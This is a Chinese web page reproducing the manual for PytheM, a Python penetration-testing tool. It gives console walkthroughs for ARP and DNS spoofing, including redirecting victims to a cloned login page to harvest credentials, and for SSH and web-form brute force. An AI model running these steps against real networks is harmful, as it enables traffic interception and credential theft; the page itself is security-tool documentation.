PytheM是一个Python渗透测试框架。它只能在osnGNU/Linux OS系统上运行。
安装
$sudo apt-get update $sudo apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev $sudo git clone https://github.com/m4n3dw0lf/PytheM/ $cd PytheM $sudo pip install -r requirements.txt
运行
$sudo ./pythem
例子
ARP欺骗-HTTP中间人攻击
命令:
pythem> set interface [+] Enter the interface: wlan0 pythem> set gateway [+] Enter the gateway: 192.168.1.1 pythem> arpspoof start [+] Setting the packet forwarding. [+] Iptables redefined. [+] ARP spoofing initialized. pythem> sniff [+] Enter the filter: http
ARP+DNS欺骗-重定向到伪造的页面,收集登录凭证
使用SET等克隆工具克隆你选中的网站,并部署在Apache2上
命令:
pythem> set target [+] Enter the target(s): 192.168.0.8 pythem> set interface wlan0 pythem> set gateway 192.168.0.1 pythem> arpspoof start [+] Setting the packet forwarding. [+] Iptables redefined. [+] ARP spoofing initialized. pythem> dnsspoof start [+] Domain to be spoofed: www.google.com [+] IP address to be redirected: 192.168.0.6 [+] DNS spoofing initialized. pythem> sniff dns
SSH暴破-暴力破解
pythem> service ssh start pythem> set target [+] Enter the target(s): 127.0.0.1 pythem> set file wordlist.txt pythem> brute-force ssh [+] Enter the username to bruteforce: anon123
Web页面参数暴力破解
首先获取web页面登录时的参数格式id= value
显示重定向页面,如果定向到一个不同的页面则说明猜解正确。
命令
pythem> set target http://127.0.0.1/ pythem> set file [+] Enter the path to the file: wordlist.txt pythem> brute-force webform [+] Brute-Form authentication initialized. [+] Enter the input id of the username box: vSIS_ID [+] Enter the input id of the password box: vSIS_PASS [+] Enter the username to brute-force the formulary: root
URL内容爆破
pythem> set target [+] Enter the target(s): http://testphp.vulnweb.com/index.php?id= pythem> set file 1to100.txt pythem> brute-force url [+] Content URL bruter initialized.
功能
[ PytheM – Penetration Testing Framework v0.3.2 ]
help:
打印帮助信息。
exit/quit:
退出程序。
set:
设置变量的值,参数:
interface
gateway
target
file
arpmode例子:
pythem> set interface | open input to set
或者
pythem> set interface wlan0 | don't open input to set value
print:
打印变量的值,例子:
pythem> print gateway
scan:
进行tcp/manualport/arp扫描.
(应该在设置完网卡和目标后再调用)例子:
pythem> scan
或者
pythem> scan tcp
arpspoof:
开始或结束arpspoofing攻击. (使用rep或req可以设置arp欺骗的模式,rep表示欺骗响应,req表示欺骗请求)
参数
start
stop
例子:
arpspoof startarpspoof stop
dnsspoof:
开始dnsspoofing攻击. (应该在arp欺骗攻击开始后再调用)例子:
pythem> dnsspoof startpythem> dnsspoof stop
sniff:
开始嗅探数据包(应该在设置网卡后再调用)例子:
pythem> sniff http
或者
pythem> sniff
[+] Enter the filter: port 1337 and host 10.0.1.5 | tcpdump like format or http,dns specific filter.
pforensic:
开始分析数据包(应该在设置完网卡和.pcap文件后调用)例子:
pythem> pforensicpforensic> help
brute-force:
开始暴力破解攻击(应该在设置完目标和字典文件路径后调用)参数:
ssh | 目标是IP地址ip address as target url | 目标是url (包含http://或https://) webform | 目标是url (包含http://或https://)例子: pythem> brute-force webform pythem> brute-force ssh
geoip:
显示IP地址的大概位置(应该在设置目标(IP地址)后再调用)例子:
pythem> geoip
或者
pythem> geoip 8.8.8.8
decode and encode:
以选择的模式解码和编码字符串,例子:
pythem> decode base64pythem> encode ascii
cookiedecode:
解码base64 url编码的cookie的值,例子:
pythem> cookiedecode
其它在控制台可以执行的命令,比如cd, ls, nano, cat 等。
Jarvis – 声音控制助手
Python的Unittest单元测试使用详解
发表于:2017-02-07
作者:Lucia
来源:
 相关文章
单元测试系列之一开篇 单元测试的实践与思考 如何用 JavaScript 编写你的第一个单元测试 如何写出有效的单元测试 Java单元测试用例的编写,有什么技巧? 单元测试:优雅的Spock框架- 周排行
- 月排行
-   白盒测试怎么测?
-   单元测试指南
-   淘系用户平台技术团队单元测试建设
-   单元测试中捕获异步方法的指定异常
-   C#中单元测试如何部署配置文件?
-   软件测试之单元测试
-   使用Microsoft Fakes进行单元测试(2)
-   一次单元测试优化的过程总结
-   白盒测试怎么测?
-   Android 单元测试,从小白到入门开始
-   鹅厂开发谈单元测试:牢记这两点,从...
-   测试驱动开发实践:如何使用 Xunit ...
-   什么是单元测试,为什么要做单元测试
-   单元测试指南